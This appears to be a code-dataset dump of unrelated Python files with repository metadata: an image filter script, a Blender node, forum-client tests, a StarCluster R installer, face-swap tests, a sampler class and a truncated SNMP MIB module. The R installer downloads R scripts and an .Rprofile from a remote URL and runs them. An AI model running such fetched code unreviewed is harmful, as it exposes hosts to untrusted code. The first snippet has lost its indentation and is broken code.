from scipy.ndimage import filters
import matplotlib.pyplot as plt
from scipy import misc
from skimage import color, data, util
def loadImg(arg):
return misc.imread(arg)
img = loadImg(sys.argv[1])
saida = sys.argv[2] + '_mediana.tif'
ms = sys.argv[3]
ms = int(ms)
img_mediana = filters.median_filter(img, size=ms)
img_saida = misc.imsave(saida, img_mediana)
| 25.676471 | 93 | 0.721649 | 129 | 873 | 4.813953 | 0.658915 | 0.038647 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028169 | 0.186712 | 873 | 33 | 94 | 26.454545 | 0.846479 | 0.504009 | 0 | 0 | 0 | 0 | 0.02864 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.466667 | 0.066667 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
f8c48be304b1a548130ccc797d3d65f47accef6d | 1,496 | py | Python | nodes/Scene/SceneRenderEngine.py | kant/RenderStackNode | 19876fc75a03edf36ae27837d193509907adbd4a | [
"Apache-2.0"
] | null | null | null | nodes/Scene/SceneRenderEngine.py | kant/RenderStackNode | 19876fc75a03edf36ae27837d193509907adbd4a | [
"Apache-2.0"
] | null | null | null | nodes/Scene/SceneRenderEngine.py | kant/RenderStackNode | 19876fc75a03edf36ae27837d193509907adbd4a | [
"Apache-2.0"
] | null | null | null | import bpy
from bpy.props import *
from ...nodes.BASE.node_tree import RenderStackNode
def update_node(self, context):
self.update_parms()
class RenderNodeSceneRenderEngine(RenderStackNode):
"""A simple input node"""
bl_idname = 'RenderNodeSceneRenderEngine'
bl_label = 'Scene Render Engine'
_enum_item_hack = []
def init(self, context):
self.outputs.new('RSNodeSocketTaskSettings', "Settings")
def draw_buttons(self, context, layout):
col = layout.column(align=1)
col.prop(self, "engine")
def process(self):
self.compare(bpy.context.scene.render, 'engine', self.engine)
def engine_enum_items(self, context):
enum_items = RenderNodeSceneRenderEngine._enum_item_hack
enum_items.clear()
# append viewport engine
enum_items.append(('BLENDER_EEVEE', 'Eevee', ''))
enum_items.append(('BLENDER_WORKBENCH', 'Workbench', ''))
addon = [engine.bl_idname for engine in bpy.types.RenderEngine.__subclasses__()]
# append to enum_items
for name in addon:
enum_items.append((name, name.capitalize(), ''))
return enum_items
temp = engine_enum_items
engine: EnumProperty(name='Engine', description='Render Eninge available',
items=temp, update=update_node)
def register():
bpy.utils.register_class(RenderNodeSceneRenderEngine)
def unregister():
bpy.utils.unregister_class(RenderNodeSceneRenderEngine)
| 27.2 | 88 | 0.680481 | 164 | 1,496 | 6.006098 | 0.414634 | 0.082234 | 0.045685 | 0.04467 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000847 | 0.210562 | 1,496 | 54 | 89 | 27.703704 | 0.833192 | 0.042781 | 0 | 0 | 0 | 0 | 0.114386 | 0.035789 | 0 | 0 | 0 | 0 | 0 | 1 | 0.21875 | false | 0 | 0.09375 | 0 | 0.53125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
f8c96c26d60fafc372cb50608cf2a61feb03cd36 | 14,688 | py | Python | test/test_posts.py | andreymal/tabun_api | 30b6a15c78c4d2f93018e570f9114058d61ba094 | [
"MIT"
] | 7 | 2015-06-18T04:57:58.000Z | 2021-05-24T05:36:39.000Z | test/test_posts.py | andreymal/tabun_api | 30b6a15c78c4d2f93018e570f9114058d61ba094 | [
"MIT"
] | 1 | 2015-07-02T00:02:44.000Z | 2015-07-02T01:40:14.000Z | test/test_posts.py | andreymal/tabun_api | 30b6a15c78c4d2f93018e570f9114058d61ba094 | [
"MIT"
] | 3 | 2015-07-03T02:20:05.000Z | 2017-01-17T20:30:09.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# pylint: disable=W0611, W0613, W0621, E1101
from __future__ import unicode_literals
import time
import json
from io import BytesIO
import pytest
import tabun_api as api
from tabun_api.compat import text
from testutil import UserTest, load_file, form_intercept, as_guest, set_mock, user, assert_data
def test_get_posts_data_ok(user):
post_data = json.loads(load_file('index_posts.json', template=False).decode('utf-8'))
posts = list(reversed(user.get_posts('/')))
assert len(posts) == len(post_data)
for data, post in zip(post_data, posts):
assert post.post_id == data['post_id']
assert_data(post, data)
def test_get_posts_data_ok_without_escape(user):
def noescape(data, may_be_short=False):
return data
old_escape = api.utils.escape_topic_contents
api.utils.escape_topic_contents = noescape
try:
post_data = json.loads(load_file('index_posts.json', template=False).decode('utf-8'))
posts = list(reversed(user.get_posts('/')))
assert len(posts) == len(post_data)
for data, post in zip(post_data, posts):
assert post.post_id == data['post_id']
assert_data(post, data)
finally:
api.utils.escape_topic_contents = old_escape
def test_get_posts_profile_data_ok(user, set_mock):
set_mock({'/profile/test/created/topics/': 'profile_topics.html'})
post_data = json.loads(load_file('profile_topics.json', template=False).decode('utf-8'))
posts = list(reversed(user.get_posts('/profile/test/created/topics/')))
assert len(posts) == len(post_data)
for data, post in zip(post_data, posts):
assert post.post_id == data['post_id']
assert_data(post, data)
def test_get_posts_types_ok(user):
posts = reversed(user.get_posts('/'))
for post in posts:
assert isinstance(post.author, text)
assert post.blog is None or isinstance(post.blog, text)
assert isinstance(post.blog_name, text)
assert isinstance(post.title, text)
assert isinstance(post.raw_body, text)
assert isinstance(post.tags[0], text)
assert isinstance(post.comments_count, int)
assert post.cut_text is None or isinstance(post.cut_text, text)
assert isinstance(post.context, dict)
def test_get_posts_context_user_ok(user):
posts = reversed(user.get_posts('/'))
for post in posts:
c = post.context
assert isinstance(c['username'], text)
assert isinstance(c['http_host'], text)
assert isinstance(c['url'], text)
assert isinstance(c['can_comment'], type(None)) # not available on lists
assert isinstance(c['can_edit'], bool)
assert isinstance(c['can_delete'], bool)
assert isinstance(c['can_vote'], bool)
assert isinstance(c['vote_value'], (int, type(None))) # None is not voted
assert isinstance(c['favourited'], bool)
assert isinstance(c['subscribed_to_comments'], type(None)) # not available on lists
assert isinstance(c['unread_comments_count'], int)
def test_get_posts_context_guest_ok(user, as_guest):
posts = reversed(user.get_posts('/'))
for post in posts:
c = post.context
assert isinstance(c['username'], type(None))
assert isinstance(c['http_host'], text)
assert isinstance(c['url'], text)
assert isinstance(c['can_comment'], type(None)) # not available no lists
assert isinstance(c['can_edit'], bool)
assert isinstance(c['can_delete'], bool)
assert isinstance(c['can_vote'], bool)
assert isinstance(c['vote_value'], (int, type(None))) # None is not voted
assert isinstance(c['favourited'], bool)
assert isinstance(c['subscribed_to_comments'], type(None)) # not available on lists
assert isinstance(c['unread_comments_count'], int)
def test_get_post_ok(user):
post = user.get_post(132085)
assert post.post_id == 132085
assert post.author == 'test'
assert post.private is False
assert post.blog is None
assert post.draft is True
assert post.short is False
assert time.strftime("%Y-%m-%d %H:%M:%S", post.time) == "2015-05-30 19:14:04"
assert post.utctime.strftime('%Y-%m-%d %H:%M:%S') == '2015-05-30 16:14:04'
assert post.title == 'Тест'
assert post.raw_body == '<strong>Раз</strong><br/>\n<h4>Два</h4>И ломаем вёрстку <img src="http://ya.ru/" alt="'
assert post.tags == ["тег1", "тег2"]
assert post.cut_text is None
assert post.comments_count == 5
assert post.context['username'] == 'test'
assert post.context['http_host'] == 'https://tabun.everypony.ru'
assert post.context['url'] == 'https://tabun.everypony.ru/blog/132085.html'
assert post.context['can_comment'] is True
assert post.context['can_edit'] is True
assert post.context['can_delete'] is True
assert post.context['can_vote'] is False
assert post.context['vote_value'] is None
assert post.context['favourited'] is False
assert post.context['subscribed_to_comments'] is True
assert post.context['unread_comments_count'] == 0
def test_get_post_other_ok(user):
post = user.get_post(138982, 'borderline')
assert post.post_id == 138982
assert post.author == 'test2'
assert post.private is True
assert post.blog == 'borderline'
assert post.draft is False
assert post.short is False
assert time.strftime("%Y-%m-%d %H:%M:%S", post.time) == "2015-09-10 15:39:13"
assert post.title == 'Тестирование ката'
assert post.raw_body == '<img src="https://i.imgur.com/V3KzzyAs.png"/>Текст до ката<br/>\n<a></a> <br/>\nТекст после ката<img src="https://i.imgur.com/NAg929K.jpg"/>'
assert post.tags == ["Луна", "аликорны", "новость"]
assert post.comments_count == 0
assert post.cut_text is None
assert post.vote_count == 35
assert post.vote_total == 36
assert post.context['username'] == 'test'
assert post.context['http_host'] == 'https://tabun.everypony.ru'
assert post.context['url'] == 'https://tabun.everypony.ru/blog/borderline/138982.html'
assert post.context['can_comment'] is False
assert post.context['can_edit'] is False
assert post.context['can_delete'] is False
assert post.context['can_vote'] is False
assert post.context['vote_value'] == 1
assert post.context['favourited'] is True
assert post.context['subscribed_to_comments'] is False
assert post.context['unread_comments_count'] == 0
def test_get_post_other_blog_1(set_mock, user):
set_mock({'/blog/news/132085.html': ('132085.html', {'url': '/blog/132085.html'})})
assert user.get_post(132085, 'news').blog is None
def test_get_post_other_blog_2(set_mock, user):
set_mock({'/blog/blog/132085.html': ('132085.html', {'url': '/blog/132085.html'})})
assert user.get_post(132085, 'blog').blog is None
@pytest.mark.parametrize("blog_id,blog,result_url,draft,tags,forbid_comment", [
(6, 'news', 'https://tabun.everypony.ru/blog/news/1.html', False, ['Т2', 'Т3'], False),
(6, 'news', 'https://tabun.everypony.ru/blog/news/1.html', False, ['Т2, Т3'], True),
(None, None, 'https://tabun.everypony.ru/blog/1.html', True, ['Т2', 'Т3'], False)
])
def test_add_post_ok(form_intercept, set_mock, user, blog_id, blog, result_url, draft, tags, forbid_comment):
set_mock({
'/topic/add/': (None, {
'headers': {'location': result_url},
'status': 302, 'status_msg': 'Found'
}
)})
@form_intercept('/topic/add/')
def topic_add(data, headers):
assert data.get('blog_id') == [text(blog_id if blog_id is not None else 0).encode('utf-8')]
assert data.get('security_ls_key') == [b'0123456789abcdef0123456789abcdef']
assert data.get('topic_title') == ['Т0'.encode('utf-8')]
assert data.get('topic_text') == ['Б1'.encode('utf-8')]
assert data.get('topic_tags') == ['Т2, Т3'.encode('utf-8')]
if draft:
assert data.get('submit_topic_save') == ['Сохранить в черновиках'.encode('utf-8')]
else:
assert data.get('submit_topic_publish') == ['Опубликовать'.encode('utf-8')]
if forbid_comment:
assert data.get('topic_forbid_comment') == [b'1']
else:
assert 'topic_forbid_comment' not in data
result = user.add_post(blog_id, 'Т0', 'Б1', tags, forbid_comment, draft=draft)
assert result == (blog, 1)
@pytest.mark.parametrize("blog_id,blog,result_url,draft,tags,forbid_comment", [
(6, 'news', 'https://tabun.everypony.ru/blog/news/1.html', False, ['Т2', 'Т3'], False),
(6, 'news', 'https://tabun.everypony.ru/blog/news/1.html', False, ['Т2, Т3'], True),
(None, None, 'https://tabun.everypony.ru/blog/1.html', True, ['Т2', 'Т3'], False)
])
def test_add_poll_ok(form_intercept, set_mock, user, blog_id, blog, result_url, draft, tags, forbid_comment):
set_mock({
'/question/add/': (None, {
'headers': {'location': result_url},
'status': 302, 'status_msg': 'Found'
}
)})
@form_intercept('/question/add/')
def poll_add(data, headers):
assert data.get('blog_id') == [text(blog_id if blog_id is not None else 0).encode('utf-8')]
assert data.get('security_ls_key') == [b'0123456789abcdef0123456789abcdef']
assert data.get('topic_title') == ['Т0'.encode('utf-8')]
assert data.get('answer[]') == [b'foo', b'bar']
assert data.get('topic_text') == ['Б1'.encode('utf-8')]
assert data.get('topic_tags') == ['Т2, Т3'.encode('utf-8')]
if draft:
assert data.get('submit_topic_save') == ['Сохранить в черновиках'.encode('utf-8')]
else:
assert data.get('submit_topic_publish') == ['Опубликовать'.encode('utf-8')]
if forbid_comment:
assert data.get('topic_forbid_comment') == [b'1']
else:
assert 'topic_forbid_comment' not in data
result = user.add_poll(blog_id, 'Т0', ('foo', 'bar'), 'Б1', tags, forbid_comment, draft=draft)
assert result == (blog, 1)
def test_add_poll_error(set_mock, user):
set_mock({'/question/add/': 'topic_add_error.html'})
with pytest.raises(api.TabunResultError) as excinfo:
user.add_poll(None, '', ('foo', 'bar'), '', [])
# TODO: test len(choices) > 20
assert excinfo.value.message == 'Поле Заголовок слишком короткое (минимально допустимо 2 символов)'
@pytest.mark.parametrize("blog_id,blog,result_url,draft,tags,forbid_comment", [
(6, 'news', 'https://tabun.everypony.ru/blog/news/1.html', False, ['Т2', 'Т3'], False),
(6, 'news', 'https://tabun.everypony.ru/blog/news/1.html', False, ['Т2, Т3'], True),
(None, None, 'https://tabun.everypony.ru/blog/1.html', True, ['Т2', 'Т3'], False)
])
def test_edit_post_ok(form_intercept, set_mock, user, blog_id, blog, result_url, draft, tags, forbid_comment):
set_mock({
'/topic/edit/1/': (None, {
'headers': {'location': result_url},
'status': 302, 'status_msg': 'Found'
}
)})
@form_intercept('/topic/edit/1/')
def topic_edit(data, headers):
assert data.get('blog_id') == [text(blog_id if blog_id is not None else 0).encode('utf-8')]
assert data.get('security_ls_key') == [b'0123456789abcdef0123456789abcdef']
assert data.get('topic_title') == ['Т0'.encode('utf-8')]
assert data.get('topic_text') == ['Б1'.encode('utf-8')]
assert data.get('topic_tags') == ['Т2, Т3'.encode('utf-8')]
if draft:
assert data.get('submit_topic_save') == ['Сохранить в черновиках'.encode('utf-8')]
else:
assert data.get('submit_topic_publish') == ['Опубликовать'.encode('utf-8')]
if forbid_comment:
assert data.get('topic_forbid_comment') == [b'1']
else:
assert 'topic_forbid_comment' not in data
result = user.edit_post(1, blog_id, 'Т0', 'Б1', tags, forbid_comment, draft=draft)
assert result == (blog, 1)
def test_edit_post_error(set_mock, user):
set_mock({'/topic/edit/1/': 'topic_add_error.html'})
with pytest.raises(api.TabunResultError) as excinfo:
user.edit_post(1, None, '', '', [])
assert excinfo.value.message == 'Поле Заголовок слишком короткое (минимально допустимо 2 символов)'
# Тесты hashsum гарантируют обратную совместимость, так что лучше их не трогать
def test_post_hashsum_default(user):
p = user.get_posts('/')
oldver_fields = ('post_id', 'time', 'draft', 'author', 'blog', 'title', 'body', 'tags')
assert p[0].post_id == 100000
assert p[0].hashsum(oldver_fields) == 'e93efead3145c59b9aac26037b9c5fcf'
assert p[1].post_id == 131909
assert p[1].hashsum(oldver_fields) == 'b6147c9ba6dbc7e8e07db958390108bd'
assert p[2].post_id == 131911
assert p[2].hashsum(oldver_fields) == '33b7a175c45eea8e5f68f4bc885f324b'
assert p[3].post_id == 131915
assert p[3].hashsum(oldver_fields) == '51b480ee57ee3166750e4f15f6a48f1f'
assert p[4].post_id == 131904
assert p[4].hashsum(oldver_fields) == 'd28e3ff695cd4cdc1f63e5919da95516'
assert p[5].post_id == 131937
assert p[5].hashsum(oldver_fields) == '93ef694d929b03b2f48b702ef68ce77b'
assert p[0].hashsum() == '2f452e09ee106a2beeb5a48927ad72b3'
assert p[1].hashsum() == '5308ccc03831ea4f4f3f3661440fcc75'
assert p[2].hashsum() == 'fb329febe4d073359b1d974098557994'
assert p[3].hashsum() == 'bed41b4d1ab3fa5b6b340f186067d6d5'
assert p[4].hashsum() == '2c49d10769e1fb28cb78cfaf8ac6cd0e'
assert p[5].hashsum() == '6c35ba542fd4f65ab9aac97943ca6672'
def test_post_hashsum_part(user):
p = user.get_posts('/')
assert p[0].post_id == 100000
assert p[0].hashsum(('title', 'body', 'tags')) == 'efeff4792ac7666c280b06d6d0ae1136'
assert p[1].post_id == 131909
assert p[1].hashsum(('title', 'body', 'tags')) == 'dacf2a4631636a1ab796681d607c11e0'
assert p[2].post_id == 131911
assert p[2].hashsum(('title', 'body', 'tags')) == '1381908ebf93038617b400f59d97646a'
assert p[3].post_id == 131915
assert p[3].hashsum(('title', 'body', 'tags')) == '9fbca162a43f2a2b1dff8c5764864fdf'
assert p[4].post_id == 131904
assert p[4].hashsum(('title', 'body', 'tags')) == '61a43c4d0f33313bfb4926fb86560450'
assert p[5].post_id == 131937
assert p[5].hashsum(('title', 'body', 'tags')) == 'a49976cb3879a540334a3e93f57a752e'
# Потому что смешивать \n и \r\n в файлах так же, как и на сайте, очень геморройно
p[0].raw_body = p[0].raw_body.replace('\n', '\r\n')
assert p[0].hashsum(('title', 'body', 'tags')) == '1364ee5a2fee913325d3b220d43623a5'
# TODO: rss
| 43.455621 | 170 | 0.656182 | 2,006 | 14,688 | 4.645563 | 0.14656 | 0.0558 | 0.034875 | 0.029295 | 0.710806 | 0.677326 | 0.636334 | 0.611654 | 0.604571 | 0.604357 | 0 | 0.067322 | 0.18287 | 14,688 | 337 | 171 | 43.58457 | 0.709132 | 0.027982 | 0 | 0.52381 | 0 | 0.007326 | 0.266054 | 0.081674 | 0 | 0 | 0 | 0.002967 | 0.571429 | 1 | 0.076923 | false | 0 | 0.029304 | 0.003663 | 0.10989 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f8ccc3a249f05d3d69f60b2904dd45f6d745429d | 3,128 | py | Python | R_3_1_1.py | meissnert/StarCluster-Plugins | a84dc5f62b5a37e7843c0fb4ac69011ecd766e51 | [
"MIT"
] | 1 | 2016-05-27T19:58:53.000Z | 2016-05-27T19:58:53.000Z | R_3_1_1.py | meissnert/StarCluster-Plugins | a84dc5f62b5a37e7843c0fb4ac69011ecd766e51 | [
"MIT"
] | null | null | null | R_3_1_1.py | meissnert/StarCluster-Plugins | a84dc5f62b5a37e7843c0fb4ac69011ecd766e51 | [
"MIT"
] | null | null | null | from starcluster.clustersetup import ClusterSetup
from starcluster.logger import log
class RInstaller(ClusterSetup):
def run(self, nodes, master, user, user_shell, volumes):
for node in nodes:
log.info("Installing R 3.1.1 on %s" % (node.alias))
log.info("...installing dependencies")
node.ssh.execute('apt-get install -y libreadline-dev ncurses-dev libpng-dev texinfo texlive texlive-base luatex texlive-latex-base texlive-luatex texlive-extra-utils texlive-latex-recommended texlive-fonts-extra freetype* libxml2 libxml2-dev libpng12-dev libcurl4-openssl-dev tk-dev xterm')
node.ssh.execute('apt-get install -y libgtk2.0-dev xorg-dev')
log.info("...dependencies installed --> --> downloading R")
node.ssh.execute('wget -c -P /opt/software/R http://cran.us.r-project.org/src/base/R-3/R-3.1.1.tar.gz')
log.info("...R has downloaded --> decompressing files")
node.ssh.execute('tar xvzf /opt/software/R/R-3.1.1.tar.gz -C /opt/software/R')
log.info("...files decompressed --> running ./configure")
node.ssh.execute('cd /opt/software/R/R-3.1.1 && ./configure --with-lapack --with-blas --with-pic --enable-threads --with-x=yes --enable-R-shlib --with-libpng --with-jpeglib --with-recommended-packages=yes')
log.info("...configure has finished --> running make")
node.ssh.execute('make -C /opt/software/R/R-3.1.1')
log.info("...make has finished --> creating modulefiles")
node.ssh.execute('mkdir -p /usr/local/Modules/applications/R/;touch /usr/local/Modules/applications/R/3.1.1')
node.ssh.execute('echo "#%Module" >> /usr/local/Modules/applications/R/3.1.1')
node.ssh.execute('echo "set root /opt/software/R/R-3.1.1" >> /usr/local/Modules/applications/R/3.1.1')
node.ssh.execute('echo -e "prepend-path\tPATH\t\$root/bin" >> /usr/local/Modules/applications/R/3.1.1')
log.info("...installing R packages")
log.info("...installing packages from CRAN")
node.ssh.execute('wget -c -P /opt/software/R https://bitbucket.org/sulab/omics_pipe/raw/e345e666dd70711f79d310fe451a361893626196/dist/AWS_customBuild/Rprofile')
node.ssh.execute('cp /opt/software/R/Rprofile ~/.Rprofile')
node.ssh.execute('wget -c -P /opt/software/R https://bitbucket.org/sulab/omics_pipe/raw/e345e666dd70711f79d310fe451a361893626196/dist/AWS_customBuild/packages_cran.R')
node.ssh.execute('wget -c -P /opt/software/R https://bitbucket.org/sulab/omics_pipe/raw/e345e666dd70711f79d310fe451a361893626196/dist/AWS_customBuild/packages_bioc_1.R')
node.ssh.execute('wget -c -P /opt/software/R https://bitbucket.org/sulab/omics_pipe/raw/e345e666dd70711f79d310fe451a361893626196/dist/AWS_customBuild/packages_bioc_2.R')
node.ssh.execute('module load R/3.1.1 && Rscript /opt/software/R/packages_cran.R')
log.info("...CRAN packages have been installed --> installing BioConductor packages")
node.ssh.execute('module load R/3.1.1 && Rscript /opt/software/R/packages_bioc_1.R')
log.info("...BioConductor1 packages have been installed")
node.ssh.execute('module load R/3.1.1 && Rscript /opt/software/R/packages_bioc_2.R')
log.info("...BioConductor2 packages have been installed") | 78.2 | 293 | 0.735934 | 477 | 3,128 | 4.786164 | 0.278826 | 0.055191 | 0.110381 | 0.022777 | 0.477442 | 0.465177 | 0.452913 | 0.40035 | 0.386772 | 0.386772 | 0 | 0.062544 | 0.095269 | 3,128 | 40 | 294 | 78.2 | 0.74417 | 0 | 0 | 0 | 0 | 0.428571 | 0.730585 | 0.161393 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028571 | false | 0 | 0.057143 | 0 | 0.114286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f8cff9c1f3626dd78542132a31d4f76a9704d49a | 1,128 | py | Python | face-replace-tests.py | micah-rufsvold/yt-swap | 59de236de89853e630772a0b64d5a19b677a04d0 | [
"MIT"
] | null | null | null | face-replace-tests.py | micah-rufsvold/yt-swap | 59de236de89853e630772a0b64d5a19b677a04d0 | [
"MIT"
] | null | null | null | face-replace-tests.py | micah-rufsvold/yt-swap | 59de236de89853e630772a0b64d5a19b677a04d0 | [
"MIT"
] | null | null | null | import unittest
import os
from os import listdir, path
from pathlib import Path
class TestSwap(unittest.TestCase):
def test_imports(self):
from pytube import YouTube
def test_get_video(self):
from main import get_video
rickroll = 'https://youtu.be/dQw4w9WgXcQ'
video_path = get_video(rickroll)
self.assertTrue(path.exists(video_path))
def test_cut_video(self):
from main import cut_video
start = 30
length = 10
vid_path = Path("C:/Users/ru1072781/Repo/yt-swap/video_in/Rick Astley - Never Gonna Give You Up (Video).mp4")
cut_path = cut_video(vid_path, start, length)
self.assertTrue(path.exists(cut_path))
def test_swap_faces(self):
from main import swap_faces
vid_path = Path("C:/Users/ru1072781/Repo/yt-swap/cut_vid/Rick Astley - Never Gonna Give You Up (Video).mp4")
im_path = Path("C:/Users/ru1072781/Repo/yt-swap/image_in/obama.png")
final_path = swap_faces(vid_path, im_path)
self.assertTrue(path.exists(final_path))
if __name__ == "__main__":
unittest.main() | 34.181818 | 117 | 0.673759 | 161 | 1,128 | 4.496894 | 0.341615 | 0.038674 | 0.049724 | 0.074586 | 0.310773 | 0.247238 | 0.247238 | 0.247238 | 0.201657 | 0 | 0 | 0.033219 | 0.226064 | 1,128 | 33 | 118 | 34.181818 | 0.796105 | 0 | 0 | 0 | 0 | 0.074074 | 0.234721 | 0.123118 | 0 | 0 | 0 | 0 | 0.111111 | 1 | 0.148148 | false | 0 | 0.333333 | 0 | 0.518519 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
3e04a9768bbbb17f4ed78b49697ea7057eb92cd4 | 1,145 | py | Python | data_loading/sampler/abstract_sampler.py | justusschock/data_loading_stuff | 08a8d7b86f14a4901a9af4981d9a3c25a63ccb2a | [
"MIT"
] | null | null | null | data_loading/sampler/abstract_sampler.py | justusschock/data_loading_stuff | 08a8d7b86f14a4901a9af4981d9a3c25a63ccb2a | [
"MIT"
] | null | null | null | data_loading/sampler/abstract_sampler.py | justusschock/data_loading_stuff | 08a8d7b86f14a4901a9af4981d9a3c25a63ccb2a | [
"MIT"
] | null | null | null | from abc import abstractmethod
from ..dataset import AbstractDataset
class AbstractSampler(object):
"""
Class to define an abstract Sampling API
"""
def __init__(self, indices=None):
self._num_samples = len(indices)
@classmethod
def from_dataset(cls, dataset: AbstractDataset, **kwargs):
"""
Classmethod to initialize the sampler from a given dataset
Parameters
----------
dataset : AbstractDataset
the given dataset
Returns
-------
:class:`AbstractSampler`
The initialzed sampler
"""
indices = list(range(len(dataset)))
return cls(indices, **kwargs)
@abstractmethod
def _get_next_index(self):
"""
Function to return a single index.
Implements the actual sampling strategy.
Returns
-------
int
the next index
"""
raise NotImplementedError
def __iter__(self):
for i in range(self._num_samples):
yield self._get_next_index()
def __len__(self):
return self._num_samples
| 21.203704 | 66 | 0.582533 | 112 | 1,145 | 5.732143 | 0.473214 | 0.03271 | 0.065421 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.328384 | 1,145 | 53 | 67 | 21.603774 | 0.83485 | 0.310044 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.294118 | false | 0 | 0.117647 | 0.058824 | 0.588235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
3e18c9a970af1d41319fdc1a7a55096c5b3309da | 10,286 | py | Python | pysnmp/GARP-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/GARP-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/GARP-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module GARP-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/GARP-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 19:04:38 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, SingleValueConstraint, ValueSizeConstraint, ConstraintsIntersection, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ValueSizeConstraint", "ConstraintsIntersection", "ConstraintsUnion")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Bits, MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks, iso, ModuleIdentity, ObjectIdentity, Unsigned32, IpAddress, enterprises, Counter32, MibIdentifier, Integer32, Counter64, NotificationType, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "Bits", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "TimeTicks", "iso", "ModuleIdentity", "ObjectIdentity", "Unsigned32", "IpAddress", "enterprises", "Counter32", "MibIdentifier", "Integer32", "Counter64", "NotificationType", "Gauge32")
PhysAddress, TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "PhysAddress", "TextualConvention", "DisplayString")
cabletron = MibIdentifier((1, 3, 6, 1, 4, 1, 52))
mibs = MibIdentifier((1, 3, 6, 1, 4, 1, 52, 4))
ctronExp = MibIdentifier((1, 3, 6, 1, 4, 1, 52, 4, 2))
ctVLANMib = MibIdentifier((1, 3, 6, 1, 4, 1, 52, 4, 2, 12))
ctVLANMgr = MibIdentifier((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1))
ctGarp = MibIdentifier((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3))
ctGarpTables = MibIdentifier((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2))
garpApplicationTable = MibTable((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 1), )
if mibBuilder.loadTexts: garpApplicationTable.setStatus('mandatory')
garpApplicationEntry = MibTableRow((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 1, 1), ).setIndexNames((0, "GARP-MIB", "garpApplicationAppType"))
if mibBuilder.loadTexts: garpApplicationEntry.setStatus('mandatory')
garpApplicationAppType = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 1, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpApplicationAppType.setStatus('mandatory')
garpApplicationName = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 1, 1, 2), PhysAddress()).setMaxAccess("readonly")
